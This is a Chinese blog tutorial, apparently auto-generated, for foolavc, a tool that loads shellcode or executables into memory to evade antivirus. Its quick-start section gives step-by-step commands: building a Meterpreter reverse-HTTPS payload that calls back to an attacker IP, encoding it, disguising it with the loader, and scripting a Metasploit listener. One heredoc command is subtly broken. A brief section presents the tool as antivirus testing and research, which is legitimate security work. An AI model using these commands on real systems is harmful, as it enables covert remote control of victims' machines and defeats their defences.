foolavc 项目使用教程

于 2024-08-31 09:16:42 发布
阅读量310 收藏 11
点赞数 15
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00181/article/details/141743331
版权

foolavc 项目使用教程

foolavcfoolav successor - loads DLL, executable or shellcode into memory and runs it effectively bypassing AV 项目地址:https://gitcode.com/gh_mirrors/fo/foolavc

1、项目介绍

foolavc 是 foolav 项目的延续,旨在加载 DLL 可执行文件或 shellcode 到内存中并运行,从而有效绕过防病毒软件。原 foolav 仅提供 x86 可执行文件,并使用单一编码方式处理外部保存的负载文件。foolavc 则支持 x86 和 x86_64 架构,允许使用内部(内置)或外部负载,这些负载可以以 shellcode、DLL 或可执行文件的形式解释。

2、项目快速启动

快速启动步骤

  1. 克隆项目仓库

    git clone https://github.com/hvqzao/foolavc.git
cd foolavc

  2. 创建 Meterpreter 可执行文件

    msfvenom -p windows/x64/meterpreter_reverse_https LHOST=__ATTACKER_IP__ LPORT=8443 -f exe -o met64.exe

  3. 编码生成的可执行文件

    python m-encode.py met64.exe

  4. 使用 foolavc 作为加载器

    cp x64/Release/foolavc.exe met64.exe

  5. 创建 Metasploit 脚本

    echo >msf.rc <<EOF
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set LPORT 8443
set LHOST 0.0.0.0
set ReverseListenerBindAddress 0.0.0.0
set AutoRunScript migrate -f
show options
run -j
EOF

  6. 启动 Metasploit 控制台

    msfconsole -qL -r msf.rc

3、应用案例和最佳实践

应用案例

foolavc 可以用于测试和评估防病毒软件的检测能力,也可以用于教育和研究目的,帮助安全研究人员了解和分析恶意软件的行为。

最佳实践

  • 环境隔离:在隔离的环境中运行 foolavc,以避免对生产环境造成影响。
  • 权限控制:确保运行 foolavc 的用户权限最小化,以减少潜在的风险。
  • 日志记录:启用详细的日志记录,以便在出现问题时进行调试和分析。

4、典型生态项目

foolavc 通常与以下项目结合使用:

  • Metasploit Framework:用于生成和处理 Meterpreter 负载。
  • Python 脚本:用于编码和处理负载文件。
  • 虚拟机和容器:用于隔离运行环境,确保安全测试不会影响主机系统。

通过结合这些工具和项目,foolavc 可以更有效地进行安全测试和研究。

foolavcfoolav successor - loads DLL, executable or shellcode into memory and runs it effectively bypassing AV 项目地址:https://gitcode.com/gh_mirrors/fo/foolavc

白娥林
关注
  • 15
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
foolavc使用指南
gitblog_00353的博客
08-31 74
foolavc使用指南 foolavcfoolav successor - loads DLL, executable or shellcode into memory and runs it effectively bypassing AV 项目地址:https://gitcode.com/gh_mirrors/fo/foolavc 项目概述 foolavc是foolav的后续版本,旨在绕过防...
探秘foolavc:轻巧灵活的跨平台Payload加载工具
gitblog_00821的博客
08-30 321
探秘foolavc:轻巧灵活的跨平台Payload加载工具 foolavcfoolav successor - loads DLL, executable or shellcode into memory and runs it effectively bypassing AV 项目地址:https://gitcode.com/gh_mirrors/fo/foolavc 在当今复杂多变的信息安全...
004.Python爬虫系列-web请求全过程剖析(重点)
08-30
前言 * 本小节给各位好好剖析一下web请求的全部过程,这样有助于后面我们遇到的各种各样的网站就有了入手的基本准则了. * 那么到底我们浏览器在输入完网址到我们看到网页的整体内容,这个过程中究竟发生了些什么? * 这里我们以百度为例 * 在访问百度的时候,浏览器会把这一次请求发送到百度的服务器(百度的一台电脑),由服务器接收到这个请求, 然后加载一些数据. 返回给浏览器, 再由浏览器进行显示 * 听起来好像是个废话...但是这里蕴含着一个极为重要的东西在里面 * 注意 * 百度的服务器返回给浏览器的不直接是页面, 而是页面源代码(由html, css, js组成) * 由浏览器把页面源代码进行执行, 然后把执行之后的结果展示给用户 * 所以我们能看到在上一节的内容中,我们拿到的是百度的源代码(就是那堆看不懂的鬼东西)
程度副词.txt
08-30
文本分析
JEP143C.pdf
08-30
JEP143C
工业相机CameraLink v2.0协议文档
08-30
1.本协议为最新的cameralink协议文档; 2.协议详细接收了camera link协议的接口设计内容; 3.介绍了POCL供电要注意的问题; 4.协议介绍了lite,base,medium,full,full+五种模式配置和开发要点; 5.协议介绍了硬件设计外围电路。
时序预测-基于卷积神经网络CNN的数据时间序列预测Matlab程序 单变量
08-30
时序预测|基于卷积神经网络CNN的数据时间序列预测Matlab程序 单变量 1.程序功能已完成调试,用户可以通过一键操作生成图形和评价指标。 2.数据输入以Excel格式保存,只需更换文件,即可运行以获得个人化的实验结果。 3.代码中包含详细注释,具有较强的可读性,特别适合初学者和新手。 4.在实际数据集上的效果可能较差,需要对模型参数进行微调。 CSDN:机器不会学习CL 时序预测|基于卷积神经网络CNN的数据时间序列预测Matlab程序 单变量 1.程序功能已完成调试,用户可以通过一键操作生成图形和评价指标。 2.数据输入以Excel格式保存,只需更换文件,即可运行以获得个人化的实验结果。 3.代码中包含详细注释,具有较强的可读性,特别适合初学者和新手。 4.在实际数据集上的效果可能较差,需要对模型参数进行微调。 CSDN:机器不会学习CL
# openssl适用Android以及OpenHarmony的支持32位以及64位arm64-v8a armeabi-v7a
08-30
# openssl适用Android以及OpenHarmony的支持32位以及64位arm64-v8a armeabi-v7a; 包括了so动态库,.a静态库,头文件 include。下载直接可以使用
基于springboot房产销售系统设计与实现.docx
08-30
基于springboot房产销售系统设计与实现.docx
stopwords.txt
08-30
文本分析
根据不同的地区和个人口味,月饼的制作方法也有很大的区别 下面提供几种经典月饼的制作步骤,包括广式月饼、苏式月饼和冰皮月饼
08-30
每一种都有其特点和风味。制作月饼时要注意各个步骤的细节,尤其是温度控制和材料配比,这样才能做出美味的月饼。希望你能成功制作出自己满意的月饼!
iotdb-1.3.2
08-30
iotdb-1.3.2
简道云零代码新动能-企业零代码数字化创新实践案例集2.02022300页.pdf
08-30
各行业零代码、低代码应用案例
超市商品库存信息管理系统-大一C语言课设
08-30
项目资源】:包含前端、后端、移动开发、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源,毕业设计等各种技术项目的源码。包括C++、Java、python、web、C#、EDA等项目的源码。 【适用人群】:适用于希望学习不同技术领域的初学者或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
这是 MATLAB 中基于 OFDM 的发射机的实现
08-30
OFDM 系列 这是 MATLAB 中基于 OFDM 的发射机的实现。 恒定包络 OFDM 该代码还为无线发射器实现了恒定包络正交频分复用方案。
计算机网络习题以及答案3.docx
08-30
《计算机网络习题集》是一本针对计算机网络基础和应用的综合习题书。书中涵盖了网络模型、协议、IP地址、路由协议、数据传输、网络安全等多个核心主题的习题。每个章节包含大量的理论题和实践题,帮助读者深入理解计算机网络的关键概念。习题配有详细的答案和解析,便于读者自学、复习或准备考试。该书适合计算机网络课程的学生、网络工程师以及所有希望深入掌握计算机网络知识的人士。
2000-2021年各省农业碳排放测算数据(计算过程+结果)(全新整理)
08-30
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/141308879 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 ## 数据指标说明 资源名称:2000-2021年各省农业碳排放测算数据 区域范围:全国31个省份 时间范围:2000-2021年 主要变量: 化肥使用量(万吨) 塑料薄膜使用量(吨) 农用柴油使用量(万吨) 农药使用量(吨) 农作物播种面积(千公顷) 灌溉面积(千公顷) 化肥碳排放量(万吨) 薄膜碳排放量(万吨) 柴油碳排放量(万吨) 农药碳排放量(万吨) 翻耕碳排放量(万吨)
c语言数字图像处理-c-image-processing.zip
最新发布
08-30
sonarqube安装配置c语言数字图像处理_c_image_processing.zip c语言数字图像处理_c_image_processing.zip c语言数字图像处理_c_image_processing.zip c语言数字图像处理_c_image_processing.zip c语言数字图像处理_c_image_processing.zip
SNIA-SSS-PTS-2.0.2
08-30
SNIA-SSS-PTS-2.0.2-
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白娥林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值